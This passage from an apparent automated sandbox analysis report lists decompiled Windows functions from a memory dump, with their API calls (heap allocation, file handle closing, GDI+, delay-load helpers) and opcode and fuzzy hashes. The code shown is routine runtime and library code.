0x00188601
0x00000000
0x00188601
0x001885d7
0x001885dc
0x001885dd
0x001885df
0x00000000
0x00000000
0x001885df
0x00000000
0x001885e1
0x001885ba
0x001885bb
0x001885c0
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00193958,00000000,?,0018905A,00000001,00000364,?,?,?,0016D25E,?,03248F10,00000063,00000004,0016CFE0), ref: 001885EA

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f98c676c3663acadece2198df6969c53dabc66805f0a72d1c6bc79fdbd6142e6
Instruction ID: 5bc4f4266ff955af5212a1b302d4208d0112254f13b3cd6337b5f20aa0ef3592
Opcode Fuzzy Hash: f98c676c3663acadece2198df6969c53dabc66805f0a72d1c6bc79fdbd6142e6
Instruction Fuzzy Hash: 19F0E9316441226BDB313F269C05B6B77899F917B0B958111FC18E60C1CF20EF018FE4

Uniqueness

Uniqueness Score: -1.00%

Function 00165BD7, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00165BD7(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0017E28C(E00191D6E, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0016B07D(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0016FE8B();
				 *(_t36 - 4) = 1;
				E0016FE8B();
				 *(_t36 - 4) = 2;
				E0016FE8B();
				 *(_t36 - 4) = 3;
				E0016FE8B();
				 *(_t36 - 4) = 4;
				E0016FE8B();
				 *(_t36 - 4) = 5;
				E00165DCC(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00165bd7
0x00165bdc
0x00165be1
0x00165be3
0x00165be5
0x00165be8
0x00165bed
0x00165bed
0x00165bf7
0x00165c02
0x00165c06
0x00165c11
0x00165c15
0x00165c20
0x00165c24
0x00165c2f
0x00165c33
0x00165c3a
0x00165c3e
0x00165c49
0x00165c53

APIs

__EH_prolog.LIBCMT ref: 00165BDC

Part of subcall function 0016B07D: __EH_prolog.LIBCMT ref: 0016B082

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 49ddad32d1d84fed21049b41b22ffeab34ec32947fa59275401739862f820fe6
Instruction ID: 99fd20b15491458b2d241f1a35bb3635f489d1c81539b990b80e1f0cfd9dfb16
Opcode Fuzzy Hash: 49ddad32d1d84fed21049b41b22ffeab34ec32947fa59275401739862f820fe6
Instruction Fuzzy Hash: 9701AD30A04684DAC724F7A4D8453EDFBE49F29300F41809DE86A53283CBB01B18C662

Uniqueness

Uniqueness Score: -1.00%

Function 00188518, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00188518(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0018895A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1c16ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00188394();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E001871AD(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00188518
0x0018851e
0x00188524
0x00188556
0x0018855b
0x00188561
0x00000000
0x00188561
0x00188528
0x0018852a
0x0018852a
0x00188541
0x0018854a
0x00188552
0x00000000
0x00000000
0x00188532
0x00188534
0x00000000
0x00000000
0x00188537
0x0018853c
0x0018853d
0x0018853f
0x00000000
0x00000000
0x0018853f
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018C13D,00000000,?,001867E2,?,00000008,?,001889AD,?,?,?), ref: 0018854A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 87b4491cea2b4c540507c4ec968e718fb29828aac39c39bf35430f76636c2a09
Instruction ID: bac23985799d810f7f6a71afd1007737ac1b58594831e542e2c86d655698bd96
Opcode Fuzzy Hash: 87b4491cea2b4c540507c4ec968e718fb29828aac39c39bf35430f76636c2a09
Instruction Fuzzy Hash: C9E0E5616401215AEB3136695C00B5A7B8CAF513B0F950210FC14E24C1CF60DF008FF5

Uniqueness

Uniqueness Score: -1.00%

Function 001696D0, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E001696D0(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1a)) != _t16) {
					E00166E3E(0x1a0f50, _t21 + 0x24);
				}
				return _t16;
			}

0x001696d2
0x001696d4
0x001696da
0x001696e0
0x001696f1
0x001696f6
0x001696f8
0x001696f8
0x001696fa
0x001696fa
0x001696fe
0x00169704
0x00169714
0x00169714
0x0016971d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0016968F,?,?,?,?,00191FA1,000000FF), ref: 001696EB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bfef8c5c74ecc42c9b1c7264c7df930695bee57ebafcadc35d88d7b50259fa38
Instruction ID: ad2a49612997106306e6a1cb02b35be160d040d6742eb998d53348e34a3075fc
Opcode Fuzzy Hash: bfef8c5c74ecc42c9b1c7264c7df930695bee57ebafcadc35d88d7b50259fa38
Instruction Fuzzy Hash: DFF08270556B048FDB308A24DD49792B7E9AB26735F088B1ED0F7538E0D77168AD8F00

Uniqueness

Uniqueness Score: -1.00%

Function 0016A4C6, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0016A4C6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0016B925(_a4) == 0) {
					_t12 = E0016A5F4(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E0016A1E2( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E0016A1FA( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0016a4c7
0x0016a4cf
0x0016a4dd
0x0016a4ea
0x0016a4f2
0x00000000
0x00000000
0x0016a4f5
0x0016a501
0x0016a513
0x0016a51e
0x00000000
0x0016a524
0x0016a4df
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0016A4F5

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: ae6a3a93901d446f253475c81faa2d3e58091e8603174932152d692104e6269c
Instruction ID: cf1f0ce613e05935d19171d35f985524b738058a1c2f960e5470fb8e7ad37450
Opcode Fuzzy Hash: ae6a3a93901d446f253475c81faa2d3e58091e8603174932152d692104e6269c
Instruction Fuzzy Hash: CDF0E931009380AACA225B784C047C6BB946F26331F04CA49F2FD22195C37414E59F23

Uniqueness

Uniqueness Score: -1.00%

Function 0017067C, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0017067C() {
				void* __esi;
				void* _t2;

				L0017134B(); // executed
				_t2 = E00171350();
				if(_t2 != 0) {
					_t2 = E00166E8C(_t2, 0x1a0f50, 0xff, 0xff);
				}
				if( *0x1a0f5c != 0) {
					_t2 = E00166E8C(_t2, 0x1a0f50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x0017067e
0x00170683
0x00170694
0x00170699
0x00170699
0x001706a5
0x001706aa
0x001706aa
0x001706b1
0x001706b9

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 001706B1

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 89cc6effe2f99ca39c4b7b5d1fc5b071f316ba344d67628ca011d8272e483d4e
Instruction ID: 3355aebb36150cf743321bc10405e2f3b1fd709f08a7750f165f64e7d21a3579
Opcode Fuzzy Hash: 89cc6effe2f99ca39c4b7b5d1fc5b071f316ba344d67628ca011d8272e483d4e
Instruction Fuzzy Hash: FDD05B297141507AD6237379AC167FE1A264FDB720F0D406AB40D675878B470CD652E2

Uniqueness

Uniqueness Score: -1.00%

Function 00179D7B, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00179D7B(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0017E214();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00179B0F(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00179d7e
0x00179d7f
0x00179d81
0x00179d86
0x00179d8b
0x00000000
0x00179d9c
0x00179d95
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00179D81

Part of subcall function 00179B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00179B30

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 4e1095bb071fda6d8c466aac8a26cfd14b016972414030009f66be3e5bb75b3d
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 8BD0C73065820D7ADF55BAB5DC0397A7BF9DB14350F10C165BC0C86151FF71DE14A661

Uniqueness

Uniqueness Score: -1.00%

Function 00169989, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00169989(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0016998d
0x00169995
0x0016999e
0x001699ab
0x001699a5
0x001699a7
0x001699a7
0x0016998f
0x00169991
0x00169991

APIs

GetFileType.KERNELBASE(000000FF,00169887), ref: 00169995

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: d754ed1a47e1b3ef8ec7d40f80d38decbf91372dd3da62b1705a6bcfced8d0cb
Instruction ID: 87e7e8e715bd4f73f9add3c361537565fe7a80a0ed9f272db737db251f4dcba8
Opcode Fuzzy Hash: d754ed1a47e1b3ef8ec7d40f80d38decbf91372dd3da62b1705a6bcfced8d0cb
Instruction Fuzzy Hash: E0D01231011181978F2546344D0909A7755DB8336EB3CC6A8E425C40A1D737C853F541

Uniqueness

Uniqueness Score: -1.00%

Function 0017D41A, Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017D41A(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x1a8458, 0x6a, 0x402, E0016FAEC(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E0017AC74(); // executed
				return _t7;
			}

0x0017d43f
0x0017d445
0x0017d44a

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0017D43F

Part of subcall function 0017AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017AC85
Part of subcall function 0017AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017AC96
Part of subcall function 0017AC74: IsDialogMessageW.USER32(000502BE,?), ref: 0017ACAA
Part of subcall function 0017AC74: TranslateMessage.USER32(?), ref: 0017ACB8
Part of subcall function 0017AC74: DispatchMessageW.USER32(?), ref: 0017ACC2

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: bd6bf1648335629dc419c36c19a97ab36c09ec1e78948969c40d17bda7e39cc2
Instruction ID: 64b2dc1ee6d201446d3f88a6e0b8a2b8e0548877d7fa4a98b95c05f4f25aca77
Opcode Fuzzy Hash: bd6bf1648335629dc419c36c19a97ab36c09ec1e78948969c40d17bda7e39cc2
Instruction Fuzzy Hash: ADD09E31144300BBD6162B51DE06F0F7EA6AB98B04F404554B348754B186729D71AB16

Uniqueness

Uniqueness Score: -1.00%

Function 0017D891, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D891() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2168); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 23258bd29dfd9a78cc735c06062105892da7e44f11d4d09a97aba15c5706fbd4
Instruction ID: 14790e59cce6fb49a743057a19d334e1cc4fc8209a8607a112d36d9f2bc3f863
Opcode Fuzzy Hash: 23258bd29dfd9a78cc735c06062105892da7e44f11d4d09a97aba15c5706fbd4
Instruction Fuzzy Hash: 54B0129566C3057D360C21407E92D3B023CCCD0B10331C52EF00EF00C0D7409C494432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8B6, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8B6() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c215c); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4666dd28686a4b61fca5d0fba6706ccadcb42ac78728d30aa9798c007bff8c3f
Instruction ID: 6f98bcfd142eb25d133dd15d53f4350175d4542449190629f2cb0a58fbb71964
Opcode Fuzzy Hash: 4666dd28686a4b61fca5d0fba6706ccadcb42ac78728d30aa9798c007bff8c3f
Instruction Fuzzy Hash: 3CB0129166C1056D320C61447E42E36027CCCD1B10334C02FF40EE02C0D7409C0A0432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8AC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8AC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2160); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4edbc4d0cced5a3e50aa116ae3871ac8049c65c61d2d9207f7a076a7440f4df8
Instruction ID: 3c3f6b585287f1924ca415e1947bd274ff71ca3e880d18487dafb7cf2752414a
Opcode Fuzzy Hash: 4edbc4d0cced5a3e50aa116ae3871ac8049c65c61d2d9207f7a076a7440f4df8
Instruction Fuzzy Hash: 8FB012D566C1096D320C61447E82E3B027CDCD0B10330C01EF00EE01C0DB409C050532

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8DE, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8DE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c214c); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9bdac25932e8f5090b1d97fe3ce7f17b9cabe15e115e22f18fe8d6b57ad745f0
Instruction ID: 92a455b2f2a8c1aa0fd1253334321f7cb7260ad55233cafc4a54745988d26bb8
Opcode Fuzzy Hash: 9bdac25932e8f5090b1d97fe3ce7f17b9cabe15e115e22f18fe8d6b57ad745f0
Instruction Fuzzy Hash: 7EB012A266C1056D320C61447E42E36027CCCD1B10330C01EF40EE01C0D7409C050432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8C0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8C0() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2158); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f2cd27bdc353d0bbf74ac8dc961a0b4684a43ea148c82e913f1d662ba8f0900f
Instruction ID: 4f30d28710ba63cc849d3dda6492129f1a3f7adcda6616e4013900fead514242
Opcode Fuzzy Hash: f2cd27bdc353d0bbf74ac8dc961a0b4684a43ea148c82e913f1d662ba8f0900f
Instruction Fuzzy Hash: 37B0129166C1056D324C61447E42E36027CCCD0B10335C12EF00EE02C0D7409C8A0432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8CA, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8CA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2154); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

